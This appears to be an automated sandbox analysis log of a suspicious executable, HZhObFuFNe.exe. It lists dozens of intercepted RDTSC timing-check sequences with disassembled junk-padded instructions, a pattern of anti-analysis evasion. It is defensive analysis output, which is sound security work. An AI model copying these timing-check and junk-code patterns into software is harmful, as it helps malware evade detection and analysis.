Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520F06 second address: 1520F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnp 00007F6FA52293B9h 0x00000010 add dh, FFFFFF99h 0x00000013 push 00000004h 0x00000015 pushad 0x00000016 sub si, 41B2h 0x0000001b cmc 0x0000001c popad 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007F6FA52293B8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1520F2E second address: 1520F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6FA4524816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 157FFF3 second address: 1580008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jl 00007F6FA52293B6h 0x0000000e pop ecx 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1580008 second address: 158000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 158000E second address: 1580024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6FA52293BDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1580181 second address: 1580186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15802CD second address: 15802EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BFh 0x00000009 jbe 00007F6FA52293B6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1580621 second address: 1580627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1580627 second address: 158063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6FA52293BDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1580905 second address: 1580909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1580909 second address: 158090F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 158090F second address: 1580914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1580914 second address: 158091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1580C68 second address: 1580C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F6FA4524822h 0x0000000b jmp 00007F6FA4524829h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15814B2 second address: 15814C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1585B2C second address: 1585B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6FA4524816h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1585B38 second address: 1585B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6FA52293B6h 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007F6FA52293B6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1585B4E second address: 1585B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F6FA4524829h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14D29CB second address: 14D29E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6FA52293C7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14D29E8 second address: 14D2A09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524828h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15850EF second address: 15850F9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA52293B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15850F9 second address: 1585102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1585102 second address: 1585108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1585108 second address: 1585119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push edx 0x00000009 jl 00007F6FA452481Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 158558C second address: 1585592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1585592 second address: 1585598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1585598 second address: 158559C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 158587C second address: 1585899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 jbe 00007F6FA4524816h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jmp 00007F6FA452481Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1585899 second address: 15858C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6FA52293BEh 0x00000008 jmp 00007F6FA52293C9h 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15858C7 second address: 15858CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 158A15C second address: 158A160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 158C36F second address: 158C375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 158C375 second address: 158C37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 158C37E second address: 158C382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1593B2F second address: 1593B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1593B35 second address: 1593B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1593B3A second address: 1593B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F6FA52293C8h 0x00000011 pop edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1593B68 second address: 1593B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1593B6F second address: 1593B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1593B8E second address: 1593B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1593B92 second address: 1593B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14E4FC9 second address: 14E4FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1591E4B second address: 1591E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1591E56 second address: 1591E60 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6FA4524816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15920DA second address: 1592108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BDh 0x00000007 jmp 00007F6FA52293C7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1592108 second address: 1592123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524827h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1592123 second address: 159214C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6FA52293BEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159214C second address: 1592163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F6FA452481Bh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1592163 second address: 1592167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1592167 second address: 159216B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15922A9 second address: 15922DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e jnp 00007F6FA52293B6h 0x00000014 jmp 00007F6FA52293C0h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1592409 second address: 159244C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F6FA4524816h 0x0000000c jmp 00007F6FA452481Eh 0x00000011 popad 0x00000012 jmp 00007F6FA4524822h 0x00000017 jns 00007F6FA452481Ch 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop ecx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159244C second address: 1592463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6FA52293C0h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15925C3 second address: 1592600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524829h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6FA4524821h 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F6FA4524816h 0x00000019 popad 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159273C second address: 1592741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15929DF second address: 1592A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA452481Bh 0x00000009 popad 0x0000000a jmp 00007F6FA4524828h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1592A07 second address: 1592A11 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6FA52293BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15932D6 second address: 15932DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15932DA second address: 15932E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15932E6 second address: 15932EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15932EA second address: 15932EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15932EE second address: 15932F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15932F4 second address: 1593304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1593304 second address: 159330B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B4BD second address: 159B4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BCh 0x00000009 pop edx 0x0000000a jnp 00007F6FA52293BEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B4D8 second address: 159B4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B4DC second address: 159B4FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F6FA52293B6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B4FF second address: 159B503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B503 second address: 159B513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F6FA52293B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B513 second address: 159B519 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B519 second address: 159B523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B523 second address: 159B529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B529 second address: 159B52D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 159B52D second address: 159B533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A5AD8 second address: 15A5ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A5ADD second address: 15A5AE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A5AE2 second address: 15A5AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A5AED second address: 15A5B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524829h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A5B0A second address: 15A5B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A835E second address: 15A8395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F6FA4524827h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A8395 second address: 15A839B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A7E6B second address: 15A7E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6FA4524816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15A7E75 second address: 15A7E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AAA35 second address: 15AAA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F6FA4524827h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 jne 00007F6FA452481Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AA876 second address: 15AA885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F6FA52293B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AA885 second address: 15AA8A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524825h 0x00000007 jnp 00007F6FA4524816h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AEAAB second address: 15AEAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15AEAB1 second address: 15AEAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B40B7 second address: 15B40BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B40BD second address: 15B40C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B56E6 second address: 15B56F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA52293BDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B56F9 second address: 15B56FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B56FD second address: 15B5701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15B5701 second address: 15B5713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F6FA4524831h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BB5B2 second address: 15BB5C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15BFF62 second address: 15BFF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
